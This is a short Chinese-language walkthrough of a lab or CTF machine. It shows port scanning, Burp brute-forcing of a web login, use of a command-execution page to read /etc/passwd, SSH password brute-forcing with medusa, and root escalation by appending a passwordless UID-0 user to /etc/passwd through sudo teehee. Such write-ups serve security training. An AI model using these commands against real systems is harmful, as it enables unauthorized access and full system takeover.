1、信息收集
1.1、端口扫描
仅开放22、80
端口,无其它服务开放
1.2、web扫描
仅一个登陆页面,使用 burp 爆破 admin 账号,得到密码happy。登陆后,页面为一个命令执行按钮,使用post方式提交请求,需要借助 burp 的 repeater 模块
1.3、信息收集
通过 repeater 模块,可以查看 passwd 内容及 home 下用户目录
jim 用户下存在信息泄露 mbox 及 backups 下的 old-passwords.bak 文件
2、获取权限
使用
medusa -u jim -P old-passwords.bak -M ssh -h 192.168.57.150 -t 100
得到密码,登陆后未发现可执行的SUID及sudo文件,通过mbox文件发现存在邮件记录。查看/var/mail/jim文件发现Charles 用户密码
2.1、信息收集
通过
sudo -l
发现 charles 用户可以以 root 权限执行teehee
teehee
可通过echo "xxx"|sudo teehee -a 'file'
的方式将内容写入到用户无法直接操作的文件中
3、权限提升
借助
teehee
,写入 root 权限的用户到passwd中提升权限
echo "zp::0:0::/root:/bin/bash" | sudo teehee -a /etc/passwd